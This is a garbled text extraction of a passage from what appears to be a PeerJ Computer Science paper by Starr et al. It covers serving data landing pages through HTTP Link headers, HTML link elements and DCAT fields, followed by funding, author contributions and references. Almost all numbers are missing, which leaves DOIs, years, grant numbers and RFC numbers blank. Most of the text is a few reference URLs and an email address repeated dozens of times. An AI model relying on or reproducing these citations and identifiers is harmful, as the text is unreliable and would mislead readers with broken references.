al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ mailto:forcnet@googlegroups.com mailto:forcnet@googlegroups.com mailto:forcnet@googlegroups.com mailto:forcnet@googlegroups.com mailto:forcnet@googlegroups.com mailto:forcnet@googlegroups.com mailto:forcnet@googlegroups.com mailto:forcnet@googlegroups.com mailto:forcnet@googlegroups.com mailto:forcnet@googlegroups.com mailto:forcnet@googlegroups.com mailto:forcnet@googlegroups.com mailto:forcnet@googlegroups.com mailto:forcnet@googlegroups.com mailto:forcnet@googlegroups.com mailto:forcnet@googlegroups.com mailto:forcnet@googlegroups.com mailto:forcnet@googlegroups.com mailto:forcnet@googlegroups.com mailto:forcnet@googlegroups.com mailto:forcnet@googlegroups.com mailto:forcnet@googlegroups.com mailto:forcnet@googlegroups.com mailto:forcnet@googlegroups.com http://dx.doi.org/ . /peerj-cs. link: “uri-to-an-alternate” rel=“alternate” media=“application/xml” title=“title” we recommend including in the title the common names of the metadata schema(s) used, such as datacite or dcat, to allow automated agents to select the appropriate alternative. as an additional fallback, we also recommend using html <link> elements to duplicate the linking information in the html version of the landing page: <link href=“uri-to-an-alternate”;rel=“alternate”; media=“application/xml”;title=“title”> embedding the information in the html has the added benefit of keeping the alternate information attached if the landing page is downloaded from a standard web browser. this is not the case for web linking through http headers, nor for content negotiation. in addition, content negotiation may not send back the full list of alternatives without the user agent sending a negotiate: vlist header (shepherd et al., ). as each of the three techniques have points where they have advantages over the others we recommend a combination of the three approaches for maximum benefit, but acknowledge that some may take more effort to implement. serving landing pages: linking to the data note that the content being negotiated is the metadata description of the research data. the data being described should not be served via this description uri. instead, the landing page data descriptions should reference the data. if the data is available from a single file, directly available on the internet, use the dcat downloadurl to indicate the location of the data. if the data is available as a relatively small number of files, either as parts of the whole collection, mirrored at multiple locations, or as multiple packaged forms, link to an ore resource map (lagoze et al., ) to describe the relationships between the files. if the data requires authentication to access, use the dcat accessurl to indicate a page with instructions on how to request access to the data. this technique can also be used to describe the procedures on accessing physical samples or other non-digital data. if the data is available online but is excessive in volume, use the dcat accessurl to link to the appropriate search system to access the data. for data systems that are available either as bulk downloads or through sub-setting services, include both accessurl and downloadurl on the landing page. additional information and declarations funding this work was funded in part by generous grants from the us national institutes of health and national aeronautics and space administration, the alfred p. sloan foundation, and the european union (fp ). support from the national institutes of health (nih) starr et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. was provided via grant # nih u ai - in the big data to knowledge program, supporting the center for expanded data annotation and retrieval (cedar). support from the national aeronautics and space administration (nasa) was provided under contract nng hq c for the continued operation of the socioeconomic data and applications center (sedac). support from the alfred p. sloan foundation was provided under two grants: a. grant # - - to the harvard institute for quantitative social sciences, “helping journals to upgrade data publication for reusable research”; and b. a grant to the california digital library, “clir/dlf postdoctoral fellowship in data curation for the sciences and social sciences”. the european union partially supported this work under the fp contracts # supporting the alliance for permanent access and # supporting digital preservation for timeless business processes and services. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: national institutes of health (nih): # nih u ai - . alfred p. sloan foundation: # - - . european union (fp ): # , # . national aeronautics and space administration (nasa): nng hq c. competing interests the authors declare there are no competing interests. author contributions • joan starr and tim clark conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • eleni castro, mercè crosas, michel dumontier, robert r. downs, ruth duerr, laurel l. haak, melissa haendel, ivan herman, simon hodson, joe hourclé, john ernest kratz, jennifer lin, lars holm nielsen, amy nurnberger, stefan proell, andreas rauber, simone sacchi, arthur smith and mike taylor performed the experiments, analyzed the data, performed the computation work, reviewed drafts of the paper. references accomazzi a, henneken e, erdmann c, rots a. . telescope bibliographies: an essential component of archival data management and operations. in: society of photo-optical instrumentation engineers (spie) conference series. vol. . article id k, pp doi . / . . alsheikh-ali aa, qureshi w, al-mallah mh, ioannidis jpa. . public availability of published research data in high-impact journals. plos one ( ):e doi . /journal.pone. . starr et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . / . http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /peerj-cs. altman m, crosas m. . the evolution of data citation: from principles to implementation. iassist quarterly (spring): – . available at http://www.iassistdata.org/iq/ evolution-data-citation-principles-implementation. altman m, king g. . a proposed standard for the scholarly citation of quantitative data. dlib magazine ( / ). available at http://www.dlib.org/dlib/march /altman/ altman.html. ball a, duke m. . how to cite datasets and link to publications. technical report. datacite. available at http://www.dcc.ac.uk/resources/how-guides. begley cg, ellis lm. . drug development: raise standards for preclinical cancer research. nature ( ): – doi . / a. berners-lee t, fielding r, masinter l. . rfc : uniform resource identifiers (uri): generic syntax. available at https://www.ietf.org/rfc/rfc .txt. booth d, haas h, mccabe f, newcomer e, champion m, ferris c, orchard d. . web services architecture: w c working group note february . technical report. world wide web consortium. available at http://www.w .org/tr/ws-arch/. borgman c. . why are the attribution and citation of scientific data important? in: uhlir p, ed. for attribution—developing data attribution and citation practices and standards. summary of an international workshop. washington d.c.: national academies press. bray t, paoli j, sperberg-mcqueen cm, maler e, yergeau f. . extensible markup language (xml) . (fifth edition): w c recommendation november . available at http://www. w .org/tr/rec-xml/. clark a, evans p, strollo a. . fdsn recommendations for seismic network dois and related fdsn services, version . . technical report. international federation of digital seismograph networks. available at http://www.fdsn.org/wgiii/v . - jul -doifdsn.pdf. cnri. . handle system: unique and persistent identifiers for internet resources. available at http://www.w .org/tr/webarch/#identification. codata-icsti task group on data citation standards and practices. . out of cite, out of mind: the current state of practice, policy and technology for data citation. data science journal (september): – doi . /dsj.osom - . colquhoun d. . an investigation of the false discovery rate and the misinterpretation of p-values. royal society open science ( ): doi . /rsos. . data citation synthesis group. . joint declaration of data citation principles. available at http://force .org/datacitation. data documentation initiative. . data documentation initiative specification. available at http://www.ddialliance.org/specification/. datacite metadata working group. . datacite metadata schema for the publication and citation of research data, version . october . available at http://schema.datacite.org/meta/ kernel- . /doc/datacite-metadatakernel v . .pdf. dcat application profile working group. . dcat application profile for data portals in europe. available at https://joinup.ec.europa.eu/asset/dcat application profile/asset release/ dcat-application-profile-data-portals-europe-final. dublin core metadata initiative. . dublin core metadata element set, version . . available at http://dublincore.org/documents/dces/. dyson e. . online registries: the dns and beyond. available at http://doi.contentdirections. com/reprints/dyson excerpt.pdf. starr et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.iassistdata.org/iq/evolution-data-citation-principles-implementation http://www.dlib.org/dlib/march /altman/ altman.html http://www.dlib.org/dlib/march /altman/ altman.html http://www.dlib.org/dlib/march /altman/ altman.html http://www.dlib.org/dlib/march /altman/ altman.html http://www.dlib.org/dlib/march /altman/ altman.html http://www.dlib.org/dlib/march /altman/ altman.html http://www.dlib.org/dlib/march /altman/ altman.html http://www.dlib.org/dlib/march /altman/ altman.html http://www.dlib.org/dlib/march /altman/ altman.html http://www.dlib.org/dlib/march /altman/ altman.html http://www.dlib.org/dlib/march /altman/ altman.html http://www.dlib.org/dlib/march /altman/ altman.html http://www.dlib.org/dlib/march /altman/ altman.html http://www.dlib.org/dlib/march /altman/ altman.html http://www.dlib.org/dlib/march /altman/ altman.html http://www.dlib.org/dlib/march /altman/ altman.html http://www.dlib.org/dlib/march /altman/ altman.html http://www.dlib.org/dlib/march /altman/ altman.html http://www.dlib.org/dlib/march /altman/ altman.html http://www.dlib.org/dlib/march /altman/ altman.html http://www.dlib.org/dlib/march /altman/ altman.html http://www.dlib.org/dlib/march /altman/ altman.html http://www.dlib.org/dlib/march /altman/ altman.html http://www.dlib.org/dlib/march /altman/ altman.html http://www.dlib.org/dlib/march /altman/ altman.html http://www.dlib.org/dlib/march /altman/ altman.html http://www.dlib.org/dlib/march /altman/ altman.html http://www.dlib.org/dlib/march /altman/ altman.html http://www.dlib.org/dlib/march /altman/ altman.html http://www.dlib.org/dlib/march /altman/ altman.html http://www.dlib.org/dlib/march /altman/ altman.html http://www.dlib.org/dlib/march /altman/ altman.html http://www.dlib.org/dlib/march /altman/ altman.html http://www.dlib.org/dlib/march /altman/ altman.html http://www.dlib.org/dlib/march /altman/ altman.html http://www.dlib.org/dlib/march /altman/ altman.html http://www.dlib.org/dlib/march /altman/ altman.html http://www.dlib.org/dlib/march /altman/ altman.html http://www.dlib.org/dlib/march /altman/ altman.html http://www.dlib.org/dlib/march /altman/ altman.html http://www.dlib.org/dlib/march /altman/ altman.html http://www.dlib.org/dlib/march /altman/ altman.html http://www.dlib.org/dlib/march /altman/ altman.html http://www.dlib.org/dlib/march /altman/ altman.html http://www.dlib.org/dlib/march /altman/ altman.html http://www.dlib.org/dlib/march /altman/ altman.html http://www.dlib.org/dlib/march /altman/ altman.html http://www.dlib.org/dlib/march /altman/ altman.html http://www.dlib.org/dlib/march /altman/ altman.html http://www.dlib.org/dlib/march /altman/ altman.html http://www.dlib.org/dlib/march /altman/ altman.html http://www.dlib.org/dlib/march /altman/ altman.html http://www.dlib.org/dlib/march /altman/ altman.html http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://www.dcc.ac.uk/resources/how-guides http://dx.doi.org/ . / a https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt https://www.ietf.org/rfc/rfc .txt http://www.w .org/tr/ws-arch/ http://www.w .org/tr/ws-arch/ http://www.w .org/tr/ws-arch/ http://www.w .org/tr/ws-arch/ http://www.w .org/tr/ws-arch/ http://www.w .org/tr/ws-arch/ http://www.w .org/tr/ws-arch/ http://www.w .org/tr/ws-arch/ http://www.w .org/tr/ws-arch/ http://www.w .org/tr/ws-arch/ http://www.w .org/tr/ws-arch/ http://www.w .org/tr/ws-arch/ http://www.w .org/tr/ws-arch/ http://www.w .org/tr/ws-arch/ http://www.w .org/tr/ws-arch/ http://www.w .org/tr/ws-arch/ http://www.w .org/tr/ws-arch/ http://www.w .org/tr/ws-arch/ http://www.w .org/tr/ws-arch/ http://www.w .org/tr/ws-arch/ http://www.w .org/tr/ws-arch/ http://www.w .org/tr/ws-arch/ http://www.w .org/tr/ws-arch/ http://www.w .org/tr/ws-arch/ http://www.w .org/tr/ws-arch/ http://www.w .org/tr/ws-arch/ http://www.w .org/tr/ws-arch/ http://www.w .org/tr/ws-arch/ http://www.w .org/tr/ws-arch/ http://www.w .org/tr/rec-xml/ http://www.w .org/tr/rec-xml/ http://www.w .org/tr/rec-xml/ http://www.w .org/tr/rec-xml/ http://www.w .org/tr/rec-xml/ http://www.w .org/tr/rec-xml/ http://www.w .org/tr/rec-xml/ http://www.w .org/tr/rec-xml/ http://www.w .org/tr/rec-xml/ http://www.w .org/tr/rec-xml/ http://www.w .org/tr/rec-xml/ http://www.w .org/tr/rec-xml/ http://www.w .org/tr/rec-xml/ http://www.w .org/tr/rec-xml/ http://www.w .org/tr/rec-xml/ http://www.w .org/tr/rec-xml/ http://www.w .org/tr/rec-xml/ http://www.w .org/tr/rec-xml/ http://www.w .org/tr/rec-xml/ http://www.w .org/tr/rec-xml/ http://www.w .org/tr/rec-xml/ http://www.w .org/tr/rec-xml/ http://www.w .org/tr/rec-xml/ http://www.w .org/tr/rec-xml/ http://www.w .org/tr/rec-xml/ http://www.w .org/tr/rec-xml/ http://www.w .org/tr/rec-xml/ http://www.w .org/tr/rec-xml/ http://www.w .org/tr/rec-xml/ http://www.fdsn.org/wgiii/v . - jul -doifdsn.pdf http://www.fdsn.org/wgiii/v . - jul -doifdsn.pdf http://www.fdsn.org/wgiii/v . - jul -doifdsn.pdf http://www.fdsn.org/wgiii/v . - jul -doifdsn.pdf http://www.fdsn.org/wgiii/v . - jul -doifdsn.pdf http://www.fdsn.org/wgiii/v . - jul -doifdsn.pdf http://www.fdsn.org/wgiii/v . - jul -doifdsn.pdf http://www.fdsn.org/wgiii/v . - jul -doifdsn.pdf http://www.fdsn.org/wgiii/v . - jul -doifdsn.pdf http://www.fdsn.org/wgiii/v . - jul -doifdsn.pdf http://www.fdsn.org/wgiii/v . - jul -doifdsn.pdf http://www.fdsn.org/wgiii/v . - jul -doifdsn.pdf http://www.fdsn.org/wgiii/v . - jul -doifdsn.pdf http://www.fdsn.org/wgiii/v . - jul -doifdsn.pdf http://www.fdsn.org/wgiii/v . - jul -doifdsn.pdf http://www.fdsn.org/wgiii/v . - jul -doifdsn.pdf http://www.fdsn.org/wgiii/v . - jul -doifdsn.pdf http://www.fdsn.org/wgiii/v . - jul -doifdsn.pdf http://www.fdsn.org/wgiii/v . - jul -doifdsn.pdf http://www.fdsn.org/wgiii/v . - jul -doifdsn.pdf http://www.fdsn.org/wgiii/v . - jul -doifdsn.pdf http://www.fdsn.org/wgiii/v . - jul -doifdsn.pdf http://www.fdsn.org/wgiii/v . - jul -doifdsn.pdf http://www.fdsn.org/wgiii/v . - jul -doifdsn.pdf http://www.fdsn.org/wgiii/v . - jul -doifdsn.pdf http://www.fdsn.org/wgiii/v . - jul -doifdsn.pdf http://www.fdsn.org/wgiii/v . - jul -doifdsn.pdf http://www.fdsn.org/wgiii/v . - jul -doifdsn.pdf http://www.fdsn.org/wgiii/v . - jul -doifdsn.pdf http://www.fdsn.org/wgiii/v . - jul -doifdsn.pdf http://www.fdsn.org/wgiii/v . - jul -doifdsn.pdf http://www.fdsn.org/wgiii/v . - jul -doifdsn.pdf http://www.fdsn.org/wgiii/v . - jul -doifdsn.pdf http://www.fdsn.org/wgiii/v . - jul -doifdsn.pdf http://www.fdsn.org/wgiii/v . - jul -doifdsn.pdf http://www.fdsn.org/wgiii/v . - jul -doifdsn.pdf http://www.fdsn.org/wgiii/v . - jul -doifdsn.pdf http://www.fdsn.org/wgiii/v . - jul -doifdsn.pdf http://www.fdsn.org/wgiii/v . - jul -doifdsn.pdf http://www.fdsn.org/wgiii/v . - jul -doifdsn.pdf http://www.fdsn.org/wgiii/v . - jul -doifdsn.pdf http://www.fdsn.org/wgiii/v . - jul -doifdsn.pdf http://www.fdsn.org/wgiii/v . - jul -doifdsn.pdf http://www.fdsn.org/wgiii/v . - jul -doifdsn.pdf http://www.fdsn.org/wgiii/v . - jul -doifdsn.pdf http://www.fdsn.org/wgiii/v . - jul -doifdsn.pdf http://www.fdsn.org/wgiii/v . - jul -doifdsn.pdf http://www.fdsn.org/wgiii/v . - jul -doifdsn.pdf http://www.fdsn.org/wgiii/v . - jul -doifdsn.pdf http://www.fdsn.org/wgiii/v . - jul -doifdsn.pdf http://www.fdsn.org/wgiii/v . - jul -doifdsn.pdf http://www.fdsn.org/wgiii/v . - jul -doifdsn.pdf http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://www.w .org/tr/webarch/#identification http://dx.doi.org/ . /dsj.osom - http://dx.doi.org/ . /rsos. http://force .org/datacitation http://force .org/datacitation http://force .org/datacitation http://force .org/datacitation http://force .org/datacitation http://force .org/datacitation http://force .org/datacitation http://force .org/datacitation http://force .org/datacitation http://force .org/datacitation http://force .org/datacitation http://force .org/datacitation http://force .org/datacitation http://force .org/datacitation http://force .org/datacitation http://force .org/datacitation http://force .org/datacitation http://force .org/datacitation http://force .org/datacitation http://force .org/datacitation http://force .org/datacitation http://force .org/datacitation http://force .org/datacitation http://force .org/datacitation http://force .org/datacitation http://force .org/datacitation http://force .org/datacitation http://force .org/datacitation http://force .org/datacitation http://force .org/datacitation http://force .org/datacitation http://www.ddialliance.org/specification/ http://www.ddialliance.org/specification/ http://www.ddialliance.org/specification/ http://www.ddialliance.org/specification/ http://www.ddialliance.org/specification/ http://www.ddialliance.org/specification/ http://www.ddialliance.org/specification/ http://www.ddialliance.org/specification/ http://www.ddialliance.org/specification/ http://www.ddialliance.org/specification/ http://www.ddialliance.org/specification/ http://www.ddialliance.org/specification/ http://www.ddialliance.org/specification/ http://www.ddialliance.org/specification/ http://www.ddialliance.org/specification/ http://www.ddialliance.org/specification/ http://www.ddialliance.org/specification/ http://www.ddialliance.org/specification/ http://www.ddialliance.org/specification/ http://www.ddialliance.org/specification/ http://www.ddialliance.org/specification/ http://www.ddialliance.org/specification/ http://www.ddialliance.org/specification/ http://www.ddialliance.org/specification/ http://www.ddialliance.org/specification/ http://www.ddialliance.org/specification/ http://www.ddialliance.org/specification/ http://www.ddialliance.org/specification/ http://www.ddialliance.org/specification/ http://www.ddialliance.org/specification/ http://www.ddialliance.org/specification/ http://www.ddialliance.org/specification/ http://www.ddialliance.org/specification/ http://www.ddialliance.org/specification/ http://www.ddialliance.org/specification/ http://www.ddialliance.org/specification/ http://www.ddialliance.org/specification/ http://www.ddialliance.org/specification/ http://www.ddialliance.org/specification/ http://www.ddialliance.org/specification/ http://www.ddialliance.org/specification/ http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf http://schema.datacite.org/meta/kernel- . /doc/datacite-metadatakernel_v . .pdf 